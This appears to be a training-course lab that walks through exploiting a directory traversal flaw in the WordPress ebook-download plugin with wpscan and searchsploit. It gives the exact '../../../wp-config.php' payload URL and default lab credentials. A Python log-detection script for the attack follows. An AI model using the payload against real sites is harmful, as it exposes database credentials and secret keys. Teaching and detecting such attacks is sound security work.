
Module 08: Web Application Penetration Testing Methodology 5

Written By AKADEMY on Thursday, July 4, 2019 | 10:10 PM

Exercise 5: Exploiting Directory Traversal Vulnerability in WordPress Application

Scenario

Directory traversal allows attackers to access restricted directories, including application source code, configuration, and critical system files, and to execute commands outside of the web server's root directory. Attackers usually manipulate variables that reference files with "dot-dot-slash (../)" sequences and their variations to access these restricted directories.
As a penetration tester, you need to know how to identify a directory traversal vulnerability and test it to gain access to sensitive information.
In this lab, you will learn how to:
i. Enumerate WordPress plugins using wpscan
ii. Identify vulnerabilities using SearchSploit
iii. Exploit the vulnerability to download sensitive files
Lab Duration: 20 Minutes
  1. Click Kali Linux (External Network).
    If the Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
  2. Type root in the Username field and click Next.
  3. Type toor in the password field and click Sign In.
  4. In this lab, we are going to perform penetration testing on a WordPress website with the URL http://172.19.19.18/wordpress.
    Since we do not have any information regarding the website, let us use wpscan to extract the WordPress plugin details, hoping there is a vulnerability that allows us to gain access to its contents.
  5. Launch a command line terminal, type wpscan --url http://172.19.19.18/wordpress --enumerate p and press Enter.
    A notification appears asking you to update wpscan. Type N and press Enter to skip the update.
    This begins plugin enumeration on the WordPress website.
  6. WPScan enumerates the plugins and displays them.
    In this lab, we will be focusing on the ebook-download plugin.
  7. Now, we shall search for publicly available exploits for the plugin ebook-download.
    Type searchsploit ebook download 1.1 and press Enter.
  8. Searchsploit returns a result related to ebook-download.
    The vulnerability discovered is directory traversal and the exploit ID is 39575.
  9. We shall now copy the exploit to the root directory. To copy, type searchsploit -m 39575 and press Enter.
    A copy of the exploit gets stored in the root directory.
  10. Type cat 39575.txt and press Enter to view the proof of concept written in the exploit text file.
  11. The proof of concept shows that a directory traversal vulnerability is present in filedownload.php.
    We shall now use this URL to download the wp-config.php file.
  12. Since the URL of the WordPress site is http://172.19.19.18/wordpress, the directory traversal URL we are going to enter in this lab will be http://172.19.19.18/wordpress/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php.
    So, launch the Firefox web browser, type http://172.19.19.18/wordpress/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php and press Enter.
  13. The Opening wp-config.php dialog box appears; click Save File.
  14. A window appears displaying the root directory. Click on the Save button.
    This downloads the config file to the root directory.
  15. You will observe the downloaded wp-config.php file in the root directory, indicating that the directory traversal vulnerability has been successfully exploited.
In this lab, you have learned how to:
i. Enumerate WordPress plugins using wpscan
ii. Identify vulnerabilities using SearchSploit
iii. Exploit the vulnerability to download sensitive files
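
From the defender's side, the request used in step 12 leaves a recognisable entry in the web server's access log. The following detection sketch is an added example, not part of the original lab or of the plugin's code: it assumes combined-format access logs, the sample lines are constructed, and the function names are hypothetical. It flags requests to filedownload.php whose ebookdownloadurl value climbs out of the plugin directory, including the encoded variations of ../ mentioned in the scenario.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined log format), not captured from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jul/2019:22:10:01 +0000] "GET /wordpress/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3012
203.0.113.5 - - [04/Jul/2019:22:10:09 +0000] "GET /wordpress/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=%252e%252e%252f%252e%252e%252fwp-config.php HTTP/1.1" 200 3012
198.51.100.7 - - [04/Jul/2019:22:11:30 +0000] "GET /wordpress/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=books/guide.pdf HTTP/1.1" 200 88123
198.51.100.7 - - [04/Jul/2019:22:12:02 +0000] "GET /wordpress/?p=12 HTTP/1.1" 200 5120
"""
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
ENDPOINT, PARAM = "/filedownload.php", "ebookdownloadurl"

def fully_decode(value, max_rounds=5):
    """Undo nested percent-encoding (%252e -> %2e -> .) and normalise backslashes."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def escapes_base(path):
    """True if the path is absolute or climbs above the directory it starts in."""
    if path.startswith("/"):
        return True
    normalised = posixpath.normpath(path)
    return normalised == ".." or normalised.startswith("../")

def find_traversal(log_text):
    """Return (client_ip, decoded_value, status) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith(ENDPOINT):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get(PARAM, []):
            value = fully_decode(raw)
            if escapes_base(value):
                hits.append((ip, value, int(status)))
    return hits

if __name__ == "__main__":
    print(*find_traversal(SAMPLE_LOG), sep="\n")
```

A hit with status 200 means the server returned a file for the traversal path, so the credentials and keys in wp-config.php should be treated as exposed and rotated.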